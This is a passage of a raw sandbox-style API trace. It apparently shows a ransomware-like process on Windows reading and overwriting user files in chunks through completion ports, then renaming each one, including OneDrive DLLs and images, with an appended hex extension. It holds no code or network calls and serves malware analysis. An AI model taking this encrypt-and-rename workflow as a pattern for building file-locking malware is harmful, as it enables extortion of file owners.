CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.862] ReadFile (in: hFile=0x590, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0159.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.866] WriteFile (in: hFile=0x590, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0159.874] RtlInterlockedCompareExchange64 () returned 0x1 [0159.874] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.921] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0159.922] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll", lpString2=".CC858FC81B363B780454B09412E256A0BC645E3639CF04CE1758C4BCF70B4365" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll.CC858FC81B363B780454B09412E256A0BC645E3639CF04CE1758C4BCF70B4365") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll.CC858FC81B363B780454B09412E256A0BC645E3639CF04CE1758C4BCF70B4365" [0159.922] GetProcessHeap () returned 0x270000 [0159.922] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x17c) returned 0x3467b0 [0159.922] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x3467b0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0159.923] CloseHandle (hObject=0x590) returned 1 [0159.929] GetProcessHeap () returned 0x270000 [0159.932] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.938] RtlInterlockedCompareExchange64 () returned 0x1 [0159.938] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.945] ReadFile (in: hFile=0x590, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0159.946] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0160.049] WriteFile (in: hFile=0x5ac, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0160.076] RtlInterlockedCompareExchange64 () returned 0x3 [0160.076] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0160.078] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74723c8, ReturnLength=0x723f8ec) returned 0x0 [0160.079] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png", lpString2=".E211B8DF81BC1518F9C905546F216ECDAF714461BF0277F65EFA141522C0300B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png.E211B8DF81BC1518F9C905546F216ECDAF714461BF0277F65EFA141522C0300B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png.E211B8DF81BC1518F9C905546F216ECDAF714461BF0277F65EFA141522C0300B" [0160.079] GetProcessHeap () returned 0x270000 [0160.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7420370 [0160.079] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x723f8dc, FileInformation=0x7420370, Length=0x168, FileInformationClass=0xa) returned 0x0 [0160.086] CloseHandle (hObject=0x5b4) returned 1 [0160.175] GetProcessHeap () returned 0x270000 [0160.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0160.178] RtlInterlockedCompareExchange64 () returned 0x4 [0160.178] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0160.586] WriteFile (in: hFile=0x5ac, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0160.793] RtlInterlockedCompareExchange64 () returned 0x4 [0160.793] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0161.036] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7532378, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7532378, ReturnLength=0x723f8ec) returned 0x0 [0161.038] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll", lpString2=".A67D6DDC19258FF69185EA56E93D7E6A3B42267BD686CF93396996B7F09C5A7F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll.A67D6DDC19258FF69185EA56E93D7E6A3B42267BD686CF93396996B7F09C5A7F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll.A67D6DDC19258FF69185EA56E93D7E6A3B42267BD686CF93396996B7F09C5A7F" [0161.038] GetProcessHeap () returned 0x270000 [0161.038] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16a) returned 0x3282a8 [0161.038] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x723f8dc, FileInformation=0x3282a8, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0161.047] CloseHandle (hObject=0x594) returned 1 [0161.422] GetProcessHeap () returned 0x270000 [0161.424] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75322c8 | out: hHeap=0x270000) returned 1 [0161.432] RtlInterlockedCompareExchange64 () returned 0x2 [0161.433] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.106] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0162.107] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.111] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0162.272] RtlInterlockedCompareExchange64 () returned 0x0 [0162.272] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.328] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0162.329] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll", lpString2=".5658482A41570D119EA4A8A5B2B685ADCE59C307F4431A2A47D59618939E7A1A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll.5658482A41570D119EA4A8A5B2B685ADCE59C307F4431A2A47D59618939E7A1A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll.5658482A41570D119EA4A8A5B2B685ADCE59C307F4431A2A47D59618939E7A1A" [0162.329] GetProcessHeap () returned 0x270000 [0162.329] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x7420950 [0162.329] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x7420950, Length=0x166, FileInformationClass=0xa) returned 0x0 [0162.332] CloseHandle (hObject=0x5b8) returned 1 [0162.403] GetProcessHeap () returned 0x270000 [0162.405] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0162.405] RtlInterlockedCompareExchange64 () returned 0x1 [0162.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.431] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0162.431] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.440] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0162.440] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.454] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0162.466] RtlInterlockedCompareExchange64 () returned 0x0 [0162.466] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.469] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0162.470] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll", lpString2=".C453B1C8F703019B82019A77EE70E4E23C5765C2AF696B04F6E12964EBF7A81D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll.C453B1C8F703019B82019A77EE70E4E23C5765C2AF696B04F6E12964EBF7A81D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll.C453B1C8F703019B82019A77EE70E4E23C5765C2AF696B04F6E12964EBF7A81D" [0162.471] GetProcessHeap () returned 0x270000 [0162.471] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x328710 [0162.471] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x328710, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0162.473] CloseHandle (hObject=0x5b8) returned 1 [0162.503] GetProcessHeap () returned 0x270000 [0162.504] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0162.504] RtlInterlockedCompareExchange64 () returned 0x1 [0162.504] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.509] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0162.510] RtlInterlockedCompareExchange64 () returned 0x0 [0162.510] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.525] ReadFile (in: hFile=0x5ac, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0162.526] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.529] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0162.530] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll", lpString2=".A8EA40AFF3B27420526BFBC4D02BDC47DF3F221336EE9D949E62499630E19143" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll.A8EA40AFF3B27420526BFBC4D02BDC47DF3F221336EE9D949E62499630E19143") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll.A8EA40AFF3B27420526BFBC4D02BDC47DF3F221336EE9D949E62499630E19143" [0162.530] GetProcessHeap () returned 0x270000 [0162.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7420ac8 [0162.530] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x7420ac8, Length=0x162, FileInformationClass=0xa) returned 0x0 [0162.534] CloseHandle (hObject=0x5ac) returned 1 [0162.821] GetProcessHeap () returned 0x270000 [0162.823] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0162.830] RtlInterlockedCompareExchange64 () returned 0x1 [0162.830] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.957] ReadFile (in: hFile=0x5ac, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0162.957] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.966] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0162.971] RtlInterlockedCompareExchange64 () returned 0x0 [0162.971] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.975] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0162.977] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll", lpString2=".1CB470F858401349379EC92F606DA6A3396B5B4727298454CE7C19C4A4A50E4C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll.1CB470F858401349379EC92F606DA6A3396B5B4727298454CE7C19C4A4A50E4C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll.1CB470F858401349379EC92F606DA6A3396B5B4727298454CE7C19C4A4A50E4C" [0162.977] GetProcessHeap () returned 0x270000 [0162.977] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x176) returned 0x427ad00 [0162.977] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x427ad00, Length=0x176, FileInformationClass=0xa) returned 0x0 [0162.979] CloseHandle (hObject=0x5ac) returned 1 [0163.213] GetProcessHeap () returned 0x270000 [0163.214] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.214] RtlInterlockedCompareExchange64 () returned 0x3 [0163.214] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0163.863] ReadFile (in: hFile=0x594, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0163.864] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0163.864] WriteFile (in: hFile=0x5c0, lpBuffer=0x7620190*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7600058 | out: lpBuffer=0x7620190*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7600058) returned 1 [0163.866] RtlInterlockedCompareExchange64 () returned 0x0 [0163.866] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0163.866] WriteFile (in: hFile=0x5bc, lpBuffer=0x75ca808*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0) returned 1 [0163.867] RtlInterlockedCompareExchange64 () returned 0x1 [0163.867] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0163.867] NtQueryObject (in: Handle=0x5c0, ObjectInformationClass=0x1, ObjectInformation=0x7600108, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7600108, ReturnLength=0x723f8ec) returned 0x0 [0163.868] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg", lpString2=".026A7657F1422B374E344B64C1ADC8A828D7B48274A99FC0AFEE345F0842C17B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.026A7657F1422B374E344B64C1ADC8A828D7B48274A99FC0AFEE345F0842C17B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.026A7657F1422B374E344B64C1ADC8A828D7B48274A99FC0AFEE345F0842C17B" [0163.868] GetProcessHeap () returned 0x270000 [0163.868] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b470 [0163.869] NtSetInformationFile (FileHandle=0x5c0, IoStatusBlock=0x723f8dc, FileInformation=0x35b470, Length=0x158, FileInformationClass=0xa) returned 0x0 [0163.900] CloseHandle (hObject=0x5c0) returned 1 [0163.903] GetProcessHeap () returned 0x270000 [0163.905] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7600058 | out: hHeap=0x270000) returned 1 [0163.906] RtlInterlockedCompareExchange64 () returned 0x3 [0163.906] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.467] ReadFile (in: hFile=0x5b8, lpBuffer=0x7552400, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8) returned 1 [0164.468] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.468] NtQueryObject (in: Handle=0x5c8, ObjectInformationClass=0x1, ObjectInformation=0x7690660, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7690660, ReturnLength=0x723f8ec) returned 0x0 [0164.469] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg", lpString2=".608C74A485247A557FC35F89CA7F14CBA65DF0A6E7BEDFB6344DD0D11C1CAF70" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg.608C74A485247A557FC35F89CA7F14CBA65DF0A6E7BEDFB6344DD0D11C1CAF70") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg.608C74A485247A557FC35F89CA7F14CBA65DF0A6E7BEDFB6344DD0D11C1CAF70" [0164.469] GetProcessHeap () returned 0x270000 [0164.469] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x425d408 [0164.470] NtSetInformationFile (FileHandle=0x5c8, IoStatusBlock=0x723f8dc, FileInformation=0x425d408, Length=0x124, FileInformationClass=0xa) returned 0x0 [0164.471] CloseHandle (hObject=0x5c8) returned 1 [0164.476] GetProcessHeap () returned 0x270000 [0164.478] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76905b0 | out: hHeap=0x270000) returned 1 [0164.703] RtlInterlockedCompareExchange64 () returned 0x2 [0164.703] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.720] WriteFile (in: 